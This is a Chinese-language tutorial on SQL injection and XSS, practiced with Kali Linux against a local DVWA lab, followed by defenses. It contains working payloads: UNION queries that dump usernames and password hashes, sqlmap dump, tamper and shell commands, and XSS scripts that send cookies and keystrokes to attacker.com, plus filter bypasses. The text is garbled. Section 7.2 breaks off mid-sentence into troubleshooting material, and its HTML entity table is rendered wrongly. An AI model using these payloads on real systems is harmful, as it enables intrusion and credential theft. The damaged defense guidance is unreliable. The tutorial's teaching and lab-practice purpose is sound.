Kali Linux实战：SQL注入与XSS漏洞攻防演练

1. 项目概述：从靶场到实战的Web安全演练

如果你刚接触网络安全，或者对Kali Linux和Web渗透测试充满好奇，那么“SQL注入与XSS漏洞攻防”这个主题，几乎就是为你量身定制的入门实战手册。这不仅仅是两个技术名词的堆砌，它代表了一套完整的、从侦察到利用再到防御的实战思维闭环。我干了十多年安全，带过不少新人，发现很多人卡在理论到实践的鸿沟上——工具会用，命令会敲，但一遇到稍微变化的环境就懵了。这个项目，恰恰就是为了填平这道鸿沟。

简单来说，这个项目就是利用Kali Linux这个“安全工程师的瑞士军刀”，在一个可控的、安全的实验环境（我们称之为“靶场”）里，亲手去挖掘、利用并最终理解如何防御SQL注入和跨站脚本这两种最经典、也最危险的Web漏洞。SQL注入，本质上是让数据库“说”出了它不该说的话；而XSS，则是让用户的浏览器“执行”了攻击者精心构造的恶意脚本。它们一个在服务器端“偷数据”，一个在客户端“搞破坏”，合起来几乎能覆盖Web应用安全风险的半壁江山。

为什么选择Kali Linux？因为它集成了数百款安全工具，从信息搜集、漏洞扫描到渗透利用，开箱即用，免去了我们四处寻找、配置工具的麻烦。而为什么是SQL注入和XSS？因为它们是Web安全的“元问题”，理解了它们，你就能触类旁通地理解参数过滤、输入验证、输出编码等一系列核心安全原则。这个项目适合所有对Web安全感兴趣的朋友，无论你是想转行安全的学生、希望提升技能的后端开发，还是想了解攻击手段以便更好防御的运维人员。接下来，我会带你一步步拆解这个过程中的每一个关键环节，分享那些只有踩过坑才知道的细节。

2. 环境搭建与靶场部署：打造安全的实验沙盒

在真正动手之前，我们必须建立一个绝对安全、隔离的实验环境。记住第一条铁律：永远不要在未经授权的真实网站上进行任何渗透测试行为，那是违法的。我们的所有操作，都必须在自己完全掌控的虚拟机或容器内进行。

2.1 Kali Linux 安装与基础配置

Kali Linux的安装方式多样，对于新手，我强烈推荐使用虚拟机方案。VMware Workstation Player（个人免费）或VirtualBox都是极佳的选择。从Kali官网下载最新的ISO镜像文件，注意核对SHA256校验和，确保文件完整未被篡改。

在虚拟机中安装时，有几个细节决定了你后续使用的顺畅度：

• 磁盘空间：默认的20GB很快就会被工具和日志塞满。建议至少分配50GB，如果你打算安装更多工具或保存大量扫描结果，80GB以上更稳妥。
• 内存：Kali本身运行不需要太多内存，但当你同时运行多个重型工具（如Burp Suite、多个终端、数据库服务）时，4GB是底线，8GB才能保证流畅。我通常给我的测试机分配6GB。
• 网络适配器：务必选择“NAT模式”。这个模式让虚拟机可以访问外网（方便更新和下载工具），但外部网络无法直接访问虚拟机，提供了一个基础的网络隔离。绝对不要在实验初期使用“桥接模式”，这可能会让你的测试机暴露在局域网中，产生意外风险。
• 快照功能：这是虚拟机最重要的“后悔药”。在安装完系统、配置好基础环境后，立即创建一个干净的“初始快照”。在后续进行可能破坏系统的操作（比如某些激进的漏洞利用）前，再创建一个“实验前快照”。一旦玩脱了，可以瞬间回滚，节省大量重装时间。

系统安装完成后，第一件事不是急着炫技，而是执行基础更新：

sudo apt update && sudo apt full-upgrade -y

更新完成后，我习惯再安装两个必备的“后勤”工具：git（用于从GitHub克隆最新的POC或工具）和tmux（终端复用器，可以让你在一个窗口管理多个会话，特别适合长时间扫描任务）。

注意：Kali Linux默认用户是kali，密码也是kali。首次登录后，系统会强制你修改密码。请务必设置一个强密码，即使是在本地虚拟机中。

2.2 靶场环境的选择与部署

没有靶子的射击训练是毫无意义的。我们需要一个故意存在漏洞的Web应用来练手。DVWA和bWAPP是两大经典选择，它们难度分级清晰，非常适合学习。

这里以DVWA为例。最省事的方法不是去官网下载源码手动配置LAMP环境，而是使用Docker。Docker能秒级部署一个包含所有依赖的、隔离的DVWA实例。

# 拉取DVWA的Docker镜像 docker pull vulnerables/web-dvwa # 运行DVWA容器，将容器的80端口映射到宿主机的8080端口 docker run -d -p 8080:80 --name dvwa vulnerables/web-dvwa

执行上述命令后，打开浏览器访问http://<你的Kali-IP>:8080就能看到DVWA的登录页面。默认账号是admin，密码是password。

部署完成后，一个关键步骤是修改DVWA的安全等级。登录后，在左侧找到“DVWA Security”选项，将安全级别从默认的“Impossible”调为“Low”。这个设置直接影响着漏洞利用的难度。“Low”级别几乎没有任何防护，能让我们专注于理解漏洞原理本身，而不是绕过复杂的过滤机制。

2.3 关键辅助工具准备

工欲善其事，必先利其器。除了Kali自带的庞大工具库，我们还需要明确几个核心工具的角色：

1. 浏览器与代理：Firefox是首选，因为它有强大的安全测试插件生态。必须安装的两大插件是：
   • FoxyProxy：用于快速切换代理设置，将浏览器流量导向Burp Suite。
   • HackBar：一个轻量化的测试工具，可以快速构造和发送HTTP请求，常用于手工测试SQL注入和XSS。
2. Burp Suite Community Edition：这是Web渗透测试的“大脑”。它作为中间人代理，拦截、查看、修改和重放浏览器与服务器之间的所有HTTP/HTTPS流量。启动Burp后，需要在浏览器中配置代理（通常为127.0.0.1:8080）并安装Burp签发的CA证书（用于解密HTTPS流量），才能开始拦截。
3. 终端多路复用：如前所述，tmux或screen至关重要。你可以在一个tmux会话中运行sqlmap进行长时间扫描，在另一个面板中手动测试Payload，在第三个面板里监控网络日志，互不干扰。

环境就绪后，再次确认你的网络拓扑：Kali虚拟机（攻击机） -> 宿主机网络 -> DVWA Docker容器（靶机）。确保三者能互相通信。至此，一个安全、纯净、功能完备的渗透测试沙盒就搭建完成了。

3. SQL注入漏洞深度解析与手工利用

SQL注入之所以常年位居OWASP Top 10前列，是因为它直接威胁到应用的核心——数据库。它的原理简单得可怕：攻击者通过构造特殊的输入，欺骗后端程序将恶意SQL语句拼接到原始查询中，并交由数据库执行。

3.1 注入原理与类型识别

一切始于用户输入。假设一个登录页面的后端代码是这样的（以PHP为例）：

$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "' AND password = '" . $_POST['password'] . "'";

如果用户在用户名框输入admin' --，那么拼接后的SQL语句就变成了：

SELECT * FROM users WHERE username = 'admin' -- ' AND password = '...'

--在SQL中是注释符，它使得后面的AND password...条件被注释掉。这意味着，攻击者只需要知道一个有效的用户名（如admin），就能在不知道密码的情况下登录系统。这就是一个最简单的基于错误的布尔型注入。

在实际测试中，我们首先需要通过输入一些特殊字符（如单引号'、双引号"、括号)等）来“探路”。观察服务器的反应：

• 返回数据库错误信息（如“You have an error in your SQL syntax...”）：这通常意味着存在注入点，且错误信息可能泄露数据库类型（MySQL, PostgreSQL等）。这是“报错注入”的基础。
• 页面显示内容发生变化（如原本显示文章详情，输入'后变成空白页或错误页）：这可能存在注入，需要进一步测试。
• 页面无任何变化：不一定安全，可能是盲注。需要测试“真/假”条件。

在DVWA的Low级别下，我们可以在“SQL Injection”页面直接进行测试。输入1'，很可能看到详细的MySQL错误信息，这立刻证实了漏洞存在。

3.2 手工注入实战：从信息搜集到数据窃取

确认注入点后，手工注入遵循一个清晰的流程，目的是逐步“摸清”数据库的结构并提取数据。

第一步：判断字段数使用ORDER BY子句。ORDER BY 1表示按第一列排序，如果页面正常，说明查询结果至少有一列。我们不断增加数字：ORDER BY 2,ORDER BY 3...直到页面报错。假设ORDER BY 3正常而ORDER BY 4报错，那么原查询的字段数就是3。在DVWA中，你可以输入1' ORDER BY 3 --来测试。

第二步：确定回显点字段数已知后，我们需要知道哪几个字段的内容会显示在页面上。使用UNION SELECT语句。UNION用于合并两个查询的结果，但要求两个查询的列数一致。构造Payload：

1' UNION SELECT 1,2,3 --

如果页面原本显示ID和名字的地方，现在变成了数字2和3，那么就说明第二个和第三个字段是回显点。我们可以把这两个数字替换成我们想查询的函数或数据。

第三步：提取数据库信息现在，我们可以通过回显点，让数据库“告诉”我们它的信息。将Payload替换为：

1' UNION SELECT 1, database(), version() --

database()函数返回当前数据库名，version()返回数据库版本。这样，页面上就会显示数据库名（如dvwa）和MySQL版本号。

第四步：枚举表名和列名在MySQL中，有一个名为information_schema的系统数据库，它存储了所有其他数据库的元数据（如表名、列名）。

• 查表名：

  1' UNION SELECT 1, table_name, 3 FROM information_schema.tables WHERE table_schema = 'dvwa' --

  这会列出dvwa数据库中的所有表。你可能会看到users,guestbook等。
• 查列名：假设我们对users表感兴趣。

  1' UNION SELECT 1, column_name, 3 FROM information_schema.columns WHERE table_schema = 'dvwa' AND table_name = 'users' --

  这会列出users表的所有列，如user_id,first_name,last_name,user,password,avatar等。

第五步：提取核心数据最后，直接查询目标数据：

1' UNION SELECT 1, user, password FROM users --

在DVWA中，你会看到用户名和经过MD5哈希的密码。虽然密码是哈希值，但对于弱密码，可以通过彩虹表或在线破解网站（如crackstation.net）进行破解尝试。

实操心得：手工注入的过程，本质上是与数据库进行“问答”。你的每一个Payload都是一个精心设计的问题。保持耐心，一步步推进。在UNION注入时，务必确保前后查询的列数、数据类型大致匹配，否则会失败。对于不回显的“盲注”，则需要通过页面行为的细微差异（如响应时间、页面某个单词的存在与否）来推断查询结果的真假，过程更为繁琐。

4. 利用Sqlmap进行自动化注入测试

手工注入能让你深刻理解原理，但在面对复杂过滤或需要快速评估大量目标时，自动化工具不可或缺。Sqlmap是这方面的王者，它是一个开源的自动化SQL注入与数据库接管工具。

4.1 Sqlmap基础扫描与常用参数

针对DVWA的SQL注入点，一个最基本的扫描命令如下：

sqlmap -u "http://192.168.1.100/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=你的会话ID" --batch

• -u：指定目标URL。注意，DVWA需要登录后的会话才能访问漏洞页面。
• --cookie：这是关键！因为DVWA的漏洞页面受登录状态保护，你必须提供有效的会话Cookie。这个值可以从浏览器开发者工具的“网络”标签页或“存储”标签页中复制。
• --batch：以非交互模式运行，所有默认选择都选“是”，让工具自动进行。

运行后，Sqlmap会首先检测注入点，询问你是否要跳过其他类型数据库的测试（默认选是），然后一路自动进行。它会尝试各种注入技术（布尔盲注、时间盲注、报错注入、联合查询等），并最终告诉你注入点参数、数据库类型、后端DBMS版本等信息。

4.2 数据提取与高级功能

一旦确认注入点，就可以让Sqlmap提取数据。这是一个分层的操作：

1. 获取所有数据库名：

   sqlmap -u [URL] --cookie=[COOKIE] --dbs

2. 获取指定数据库的所有表名（例如dvwa）：

   sqlmap -u [URL] --cookie=[COOKIE] -D dvwa --tables

3. 获取指定表的所有列名（例如users表）：

   sqlmap -u [URL] --cookie=[COOKIE] -D dvwa -T users --columns

4. 提取指定列的数据（例如user和password列）：

   sqlmap -u [URL] --cookie=[COOKIE] -D dvwa -T users -C user,password --dump

   --dump命令会一次性把数据查询并保存到本地。Sqlmap检测到密码哈希时，甚至会询问你是否要调用内置的破解模块进行破解。

高级参数用于应对复杂场景：

• --level和--risk：提高测试的强度和风险等级。Level越高，测试的Payload越多、越全面。Risk等级提高（最高为3）会使用一些可能造成数据更新或删除的危险Payload，在测试生产环境或重要靶场时务必谨慎。
• --tamper：这是Sqlmap的“魔术师”参数。很多Web应用有WAF或简单的输入过滤。--tamper可以指定一个脚本，对Payload进行混淆、编码，以绕过过滤。例如，--tamper=space2comment会将空格替换为/**/。
• --proxy：通过代理（如Burp Suite）发送请求，方便你观察和调试Sqlmap发出的每一个Payload。
• --sql-shell：在成功注入后，尝试获取一个交互式的SQL shell，可以直接执行SQL命令，功能极其强大。

注意事项：虽然Sqlmap很强大，但切忌无脑使用。在实战或CTF比赛中，过度依赖自动化工具可能会触发警报（如WAF）或错过一些需要精巧手法的注入点。我的习惯是：先用简单的手工测试确认漏洞存在和基本类型，再用Sqlmap进行深度利用和数据提取，两者结合效率最高。另外，务必在授权范围内使用，并避免使用--risk 3等高风险参数，除非你完全清楚后果并已做好数据备份。

5. XSS漏洞原理与攻击向量剖析

如果说SQL注入是“后端之痛”，那么XSS就是“前端之殇”。跨站脚本攻击的核心在于，攻击者能够将恶意脚本代码注入到网页中，并被其他用户的浏览器执行。根据脚本的存储和触发位置，主要分为三类：反射型、存储型和DOM型。

5.1 反射型XSS：一次性的诱饵

反射型XSS是最常见的类型。恶意脚本作为HTTP请求的一部分（通常藏在URL参数里）发送给服务器，服务器未经处理就直接将其“反射”回响应页面中，浏览器执行了这段脚本。

一个典型的例子是搜索功能。假设一个网站的搜索结果是这么显示的：

<p>您搜索的关键词是：<?php echo $_GET['keyword']; ?></p>

如果攻击者构造一个URL发给受害者：

http://vulnerable-site.com/search.php?keyword=<script>alert('XSS')</script>

当受害者点击这个链接，服务器会返回包含<script>alert('XSS')</script>的页面，受害者的浏览器就会弹出一个警告框。当然，真实的攻击远不止弹窗，脚本可以盗取用户的Cookie（如果Cookie未设置HttpOnly）、劫持会话、重定向到钓鱼网站等。

在DVWA的“Reflected XSS”模块（Low级别），你可以直接在输入框输入<script>alert(document.cookie)</script>来测试。页面会弹窗显示你当前的会话Cookie。这证明了该处存在反射型XSS漏洞。

5.2 存储型XSS：持久化的毒药

存储型XSS的危害更大。攻击者将恶意脚本提交到服务器（如论坛帖子、用户评论、个人信息栏），并被永久存储。之后，任何访问该页面的用户，其浏览器都会执行这段恶意脚本。

DVWA的“Stored XSS”模块模拟了留言板功能。在Low级别下，在“Name”或“Message”框中输入类似<script>alert('Stored XSS!')</script>的代码并提交。之后，每当任何人（包括你自己）浏览这个留言板页面时，弹窗都会出现。这意味着攻击者可以一次性投毒，长期影响所有用户。

存储型XSS的利用场景更丰富。攻击者可以注入一个键盘记录脚本，窃取所有访问者的登录凭证；或者注入一个“挖矿”脚本，消耗访问者的CPU资源；更常见的是注入一个盗取Cookie的脚本，将Cookie发送到攻击者控制的服务器。

5.3 DOM型XSS：客户端的陷阱

DOM型XSS比较特殊，它不涉及服务器端。漏洞存在于页面的JavaScript代码中。JavaScript通过document.location、document.URL、document.referrer等对象获取数据（如URL片段#后面的部分），并直接使用innerHTML或eval()等不安全的方式将其写入页面，导致脚本执行。

例如，页面有如下JS代码：

var hash = window.location.hash.substring(1); document.getElementById('output').innerHTML = 'Welcome, ' + hash;

如果URL是http://site.com/page.html#<img src=x onerror=alert(1)>，那么hash变量的值就是<img src=x onerror=alert(1)>，它被直接写入innerHTML，onerror事件触发，执行了alert(1)。

DOM型XSS的测试和利用更依赖对前端代码的分析。你需要仔细审查页面引入的JS文件，寻找那些从location、URL等来源获取数据并动态更新DOM的地方。

6. XSS漏洞的实战利用与防御绕过

理解了原理，我们来看看如何实际利用XSS漏洞，以及当网站有简单防护时，如何尝试绕过。

6.1 构造有效的XSS Payload

弹窗alert()只是验证漏洞存在，真正的攻击Payload更有针对性。以下是一些经典Payload：

1. 盗取Cookie：

   <script>new Image().src='http://attacker.com/steal.php?cookie='+document.cookie;</script>

   这段脚本会创建一个隐藏的图片请求，将用户的Cookie作为参数发送到攻击者的服务器（attacker.com）。攻击者只需要在steal.php中记录接收到的参数即可。

2. 重定向到钓鱼网站：

   <script>window.location.href='http://evil-phishing-site.com';</script>

   瞬间将用户带到伪造的登录页面。

3. 键盘记录器（概念示例）：

   <script> document.onkeypress = function(e) { new Image().src='http://attacker.com/log.php?key='+e.key; } </script>

   记录用户的每一次按键并发送出去。

在DVWA中，你可以将这些Payload分别注入到反射型和存储型XSS的输入点，观察效果。为了接收被盗的Cookie，你需要在Kali上临时启动一个HTTP服务来监听：

# 使用Python3快速启动一个HTTP服务器在8081端口 python3 -m http.server 8081

然后，将Payload中的attacker.com替换为你的Kali IP和端口（如http://192.168.1.100:8081/）。当受害者触发XSS后，你就能在终端看到接收到的请求日志。

6.2 绕过常见的过滤机制

很多网站会尝试过滤<script>、onerror=等关键词。这时就需要一些技巧来绕过。

1. 大小写混淆：有些过滤器是大小写敏感的。

   <ScRiPt>alert(1)</ScRiPt>

2. 使用HTML实体编码：浏览器在解析innerHTML时会解码实体。

   <img src=x onerror="alert(1)"> <!-- 可以尝试编码 --> <img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

3. 利用事件处理器：除了onerror，还有数十种其他事件可用。

   <img src=x onmouseover=alert(1)> <!-- 鼠标悬停触发 --> <body onload=alert(1)> <!-- 页面加载触发 --> <svg onload=alert(1)> <!-- SVG标签 -->

4. 不使用<script>标签：利用其他标签的属性执行JS。

   <a href="javascript:alert(1)">点击</a> <iframe src="javascript:alert(1)">

5. 拆分与拼接：如果过滤了完整的alert，可以尝试拆分。

   <script>eval('al'+'ert(1)')</script>

在DVWA中，将安全级别调到“Medium”或“High”，你会发现它对输入做了过滤。例如Medium级别可能用str_replace函数简单替换掉<script>。这时，你可以尝试使用<scr<script>ipt>（过滤器移除中间的<script>后，两边的字符又拼成了<script>），或者转而使用<img>、<svg>等标签配合事件处理器。

实操心得：XSS的绕过是一场猫鼠游戏，核心在于理解过滤器的逻辑。最好的方法是“黑盒”与“白盒”结合。黑盒就是不断尝试各种Payload，观察响应；如果有可能（比如在CTF中或审计自己公司的代码），直接看后端过滤的源代码（白盒），能让你瞬间找到绕过方法。记住，没有绝对安全的过滤，只有不断更新的攻防。

7. 漏洞防御：从根源上构建安全防线

攻击是为了更好的防御。理解了攻击手法，我们才能更有效地在开发中避免它们。

7.1 SQL注入防御：参数化查询是唯一正解

防御SQL注入，有且只有一个黄金法则：使用参数化查询（预编译语句）。其他方法如转义、过滤黑名单，都是不完整且容易出错的。

为什么转义不行？因为转义规则因数据库而异（MySQL用\，Oracle用'），且上下文不同（字符串、数字、标识符）转义方式也不同，极易遗漏。参数化查询将SQL语句的结构（命令）与数据（参数）完全分离。数据库引擎先编译SQL结构，再将参数作为纯数据处理，从根本上杜绝了数据被解释为代码的可能。

以PHP的PDO为例：

// 错误做法（拼接字符串） $stmt = $pdo->query("SELECT * FROM users WHERE id = " . $_GET['id']); // 正确做法（参数化查询） $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id"); $stmt->execute(['id' => $_GET['id']]);

在Java、Python、C#等语言中，都有对应的PreparedStatement或类似机制。对于所有用户输入，只要它要进入SQL语句，就必须使用参数化查询。

次要防御措施（辅助）：

• 最小权限原则：连接数据库的应用程序账号，只应拥有完成其功能所需的最小权限（如只有SELECT，没有DROP、DELETE）。
• 输入验证：在业务层面，对输入进行严格的白名单验证（如ID只能是数字），但这不能替代参数化查询。
• 错误信息处理：生产环境应关闭详细的数据库错误回显，使用自定义的错误页面，避免泄露数据库结构信息。

7.2 XSS防御：上下文相关的输出编码

XSS的防御核心是：对任何来自不可信源的数据，在输出到不同上下文时，进行正确的编码或转义。

1. 输出到HTML正文：使用HTML实体编码。

   • 将<转为<
   • 将>转为>
   • 将&转为&
   • 将"转为"
   • 将'转为'(或') 在PHP中可以用htmlspecialchars()函数，在Python Jinja2等模板引擎中默认会自动转义。

2. 输出到HTML属性：同样使用HTML实体编码，并且属性值一定要用引号括起来。

   <!-- 错误 --> <input value=<?php echo $input; ?>> <!-- 正确 --> <input value="<?php echo htmlspecialchars($input, ENT_QUOTES); ?>">

   ENT_QUOTES标志会同时编码单引号和双引号。

3. 输出到JavaScript代码中：这非常危险，应尽量避免。如果必须，需使用JavaScript编码（如\xXX形式的Unicode转义）。

   // 危险！ var userInput = "<?php echo $input; ?>"; // 稍好（但并非绝对安全，应优先考虑其他架构） var userInput = <?php echo json_encode($input); ?>;

   更好的做法是，不将动态数据放在JS变量中，而是通过HTML的># 在浏览器中，右键点击请求 -> 复制 -> 复制为cURL (bash) # 将复制的内容保存到一个文件，如 request.txt sqlmap -r request.txt --batch

4. 问题：Sqlmap卡在某个测试阶段，或者连接被重置。

   • 排查：可能是触发了靶场的速率限制或简单的WAF。尝试添加延迟参数--delay=1（每次请求间隔1秒），或使用随机化参数--randomize。
   • 技巧：对于有防护的靶场，尝试使用--tamper脚本。常用的有space2comment（空格转注释）、between（用BETWEEN替换>）、randomcase（随机大小写）等。可以组合使用：--tamper=space2comment,between。

8.2 XSS弹窗不执行

• 问题：在DVWA中输入了<script>alert(1)</script>，但页面没有弹窗，而是显示了代码原文。

  • 排查：首先检查DVWA的安全级别，确保是Low。然后，查看页面源代码（Ctrl+U），看看你输入的Payload在HTML中是什么样子。如果被转义成了<script>...，说明后端做了HTML编码。
  • 技巧：尝试其他不需要<script>标签的Payload，如<img src=x onerror=alert(1)>。如果还是不行，查看响应头是否有Content-Security-Policy，CSP可能会阻止内联脚本执行。

• 问题：存储型XSS提交后，自己浏览能看到弹窗，但换一个浏览器或隐身窗口就不行。

  • 排查：这通常是因为你的Payload里包含了盗取Cookie的代码，而新会话没有这个Cookie。或者，某些靶场（如DVWA的高级别）可能会对存储的数据进行更严格的过滤或编码，导致Payload被破坏。检查数据库里存储的内容是否完整。

8.3 环境与网络问题

• 问题：Kali虚拟机无法访问宿主机上Docker运行的DVWA。

  • 排查：确保Docker容器的端口正确映射到了宿主机（-p 8080:80），并且宿主机防火墙允许该端口。在Kali中，尝试用curl http://宿主机IP:8080测试连通性。
  • 技巧：最简单的办法是让Kali、宿主机、Docker容器处于同一个网段。可以将Kali虚拟机的网络模式改为“桥接”，并设置静态IP，或者使用Docker的host网络模式（--network host），但后者会失去一些隔离性。

• 问题：Burp Suite抓不到浏览器的HTTPS流量。

  • 排查：确保浏览器代理设置正确指向Burp（127.0.0.1:8080）。最关键的一步是，访问http://burp下载并安装Burp的CA证书到浏览器的受信任根证书颁发机构中。Firefox使用自己的证书库，需要单独在Firefox的设置中导入证书。

8.4 思维误区与提升建议

• 不要只依赖工具：Sqlmap和Burp Suite很强大，但如果你不明白它们背后在做什么，你永远只是个“脚本小子”。手工注入和手工测试XSS的过程，是理解漏洞本质不可替代的环节。
• 关注响应变化：渗透测试中，细微的差别往往是突破口。页面加载慢了几毫秒（时间盲注）、返回结果中某个单词消失了（布尔盲注）、错误信息措辞的轻微变化，都可能是漏洞存在的信号。
• 阅读代码：如果条件允许（如CTF题目提供源码、开源项目），直接阅读源代码是最高效的漏洞挖掘方式。你可以清晰地看到参数是如何被处理、拼接、输出的。
• 搭建自己的笔记库：将每次测试成功的Payload、绕过的技巧、有趣的漏洞案例记录下来。日积月累，这就是你个人的“武器库”。

这个从搭建环境到手工利用，再到自动化工具和最终防御的完整闭环，不仅仅是掌握了两类漏洞的攻防，更重要的是建立起一套主动发现、分析、利用和解决安全问题的思维模式。安全之路漫长，保持好奇，合法测试，不断练习，你会在每一次“攻”与“防”的较量中获得真正的成长。